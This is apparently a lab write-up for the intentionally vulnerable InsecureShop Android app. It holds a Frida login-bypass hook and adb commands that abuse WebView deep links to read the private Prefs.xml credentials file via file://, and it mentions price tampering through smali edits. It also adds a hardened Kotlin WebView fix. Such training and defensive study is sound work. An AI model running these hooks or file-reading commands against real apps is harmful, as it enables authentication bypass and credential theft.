Insecure Shop Application

1- Starting the Solution

First I started using the application and found the login page. I tested some credentials to see how it reacts and tried a few SQL injection payloads, but the response was always the same: "Invalid username and password".

So I reversed the code with Jadx-GUI, searched for "username", and found a boolean function called verifyUserNamePassword(); this is the function that verifies the username and the password.


2- Hardcoded Credentials

Opening it, I found a getUserCreds() function that holds the hardcoded credentials for the login page.


3- Hooking The Login page

Now I can log in, but even if the hardcoded credentials cannot be found there is another way to bypass the login: a Frida script that uses the package name (com.insecureshop.util), the class name (Util), and the function name (verifyUserNamePassword()) that appear in the Util file.

This is the script we can use:

Java.perform(function () {
    console.log("[*] Hooking InsecureShop Login Bypass");

    // Resolve the class that holds the credential check
    var LoginBypass = Java.use("com.insecureshop.util.Util");

    // Replace verifyUserNamePassword(username, password) so it always returns true
    LoginBypass.verifyUserNamePassword.implementation = function (username, password) {
        return true;
    };

    console.log("[*] Login Bypass Hook Injected Successfully.");
});

Save it as file.js, run the Frida server on the emulator, and run this command to hook the function: frida -U -l file.js -f <Package_Name>. After that I can log in without credentials on the login page.

4- Insecure Logging

Using the logcat command to see whether the app logs data, I found that it logs it to the local file system.

I viewed the file with cat /data/data/com.insecureshop/shared_prefs/Prefs.xml and found the credentials there.


I found WebViewActivity here with the host com.insecureshop and the scheme insecureshop; it opens when /web or /webview is accessed with the parameter url, so the final link looks like this: insecureshop://com.insecureshop/web?url=<URL_Link>

So I can use the ADB Activity Manager like this to open the Google website: adb shell am start -n com.insecureshop/.WebViewActivity -d "insecureshop://com.insecureshop/web?url=http://google.com"

It worked and opened Google in the application's WebView.

I can also access app data using the file:// scheme, like this: adb shell am start -n com.insecureshop/.WebViewActivity -d "insecureshop://com.insecureshop/web?url=file:///data/data/com.insecureshop/shared_prefs/Prefs.xml"


I found WebView2Activity here, the same as the previous one but without a host and scheme, so I can open any file and any link without a specific scheme and host:

am start -n com.insecureshop/.WebView2Activity -d "file:///data/data/com.insecureshop/shared_prefs/Prefs.xml"

The value passed to -d can be either a local file such as file:///data/data/com.insecureshop/shared_prefs/Prefs.xml or a web link such as https://google.com.
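A hardened counterpart to the two WebView activities above, added here as an example and not code from InsecureShop: the deep link's scheme, host and path are checked first, then the url value must be an https URL on an allow-listed host (the host and activity names are assumptions), and file access is disabled in the WebView so file:///data/data/... can no longer be loaded.

```kotlin
import android.net.Uri
import android.os.Bundle
import android.webkit.WebView
import androidx.appcompat.app.AppCompatActivity

// Added example (not InsecureShop's code): validate what a deep link asks the
// WebView to load. The allow-listed host is an assumption for illustration.
object DeepLinkPolicy {
    private val ALLOWED_HOSTS = setOf("www.insecureshop.example")

    // Accept only https URLs on allow-listed hosts; file://, content://,
    // javascript: and plain http are all rejected.
    fun validateTarget(target: String?): String? {
        if (target == null) return null
        val uri = Uri.parse(target)
        if (uri.scheme != "https") return null
        val host = uri.host ?: return null
        if (host !in ALLOWED_HOSTS) return null
        return target
    }

    // For insecureshop://com.insecureshop/web?url=... style links: check the
    // outer deep link first, then the url parameter it carries.
    fun targetFromDeepLink(data: Uri?): String? {
        if (data == null || data.scheme != "insecureshop" || data.host != "com.insecureshop") return null
        if (data.path != "/web" && data.path != "/webview") return null
        return validateTarget(data.getQueryParameter("url"))
    }
}

class SafeWebViewActivity : AppCompatActivity() {
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        val webView = WebView(this)
        setContentView(webView)
        // Defence in depth: even if a bad URL got through, the WebView cannot
        // read app-private files such as shared_prefs/Prefs.xml.
        webView.settings.allowFileAccess = false
        webView.settings.allowContentAccess = false
        @Suppress("DEPRECATION")
        webView.settings.allowFileAccessFromFileURLs = false

        val url = DeepLinkPolicy.targetFromDeepLink(intent?.data)
        if (url == null) { finish(); return }   // drop the request instead of loading it
        webView.loadUrl(url)
    }
}
```

For the WebView2Activity case, where the intent data itself is the page to load, the same check is DeepLinkPolicy.validateTarget(intent?.data?.toString()).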

7- Editing on Smali Code

I opened file.apk in the APKLab extension in Visual Studio Code, edited the prices stored in the Smali code, rebuilt the app, and was able to buy all items at different prices.
